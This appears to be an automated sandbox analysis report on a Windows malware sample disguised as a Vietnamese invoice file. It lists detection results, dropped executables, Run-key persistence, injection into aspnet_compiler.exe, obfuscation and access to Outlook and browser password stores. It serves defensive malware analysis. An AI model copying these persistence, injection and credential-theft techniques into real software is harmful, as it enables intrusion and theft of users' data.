Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000003.271856566.0000000003772000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVgnaaeoogibheqcdzitcbxs.dll" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Binary or memory string: OriginalFilenameCgfcxatykt.exe" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

File created: C:\Users\user\AppData\Roaming\Yqxsvaorwni

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@65/22@19/5

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

14_2_004182CE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,

14_2_0040B58D

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	ReversingLabs: Detection: 27%
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Virustotal: Detection: 30%

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

File read: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Jump to behavior

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgi0vwrh.uo4.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,

14_2_00418758

Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, aspnet_compiler.exe, 0000000F.00000002.365717220.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: aspnet_compiler.exe, 0000000E.00000003.395805879.0000000002755000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.418724773.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.444163305.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.475835052.0000000003013000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.500353883.00000000028B7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.511362644.0000000000A53000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,

14_2_00413D4C

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-E9KXT7

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 28.2.Shhejayly.exe.36c99b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.381f0c0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.7610000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.7610000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.7bd0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.381f0c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.7bd0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.543466399.0000000003093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542998195.0000000002653000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.365213489.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355179401.0000000002596000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.600053448.0000000007BD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.551264239.000000000370A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271856566.0000000003772000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwn.exe PID: 2088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Shhejayly.exe PID: 4420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Shhejayly.exe PID: 5608, type: MEMORYSTR

.NET source code contains potential unpacker

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: Shhejayly.exe.0.dr, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.180000.0.unpack, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: Cuhcxlcg[1].exe.12.dr, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: dwn.exe.12.dr, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.dwn.exe.ae0000.0.unpack, Form1.cs	.Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E357F push esi; retf	0_2_077E3582
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E3DAE push ds; ret	0_2_077E3DBA
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077EAC8A push E8000001h; retf	0_2_077EAC91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10002806 push ecx; ret	12_2_10002819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E002 push edx; retf	14_2_0044E07A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E002 push edx; retf	14_2_0044E0BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E0C8 push edx; retf	14_2_0044E0CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E0B4 push edx; retf	14_2_0044E0BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E0B0 push eax; retf	14_2_0044E0B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E144 push ebp; iretd	14_2_0044E146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E148 push esp; iretd	14_2_0044E152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E17C push ecx; retf	14_2_0044E142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E130 push edi; retf	14_2_0044E136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E138 push ecx; retf	14_2_0044E142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044E1C4 push eax; retf	14_2_0044E1C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044693D push ecx; ret	14_2_0044694D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044DB70 push eax; ret	14_2_0044DB84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044DB70 push eax; ret	14_2_0044DBAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00451D54 push eax; ret	14_2_00451D61

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

14_2_004044A4

Binary contains a suspicious time stamp

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: 0xB7B87B95 [Sun Sep 4 00:13:09 2067 UTC]

Creates processes with suspicious names

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exe
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exe
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exe	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exe	Jump to behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Cuhcxlcg[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File created: C:\Users\user\AppData\Local\Temp\dwn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	File created: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Shhejayly			Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Shhejayly			Jump to behavior

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
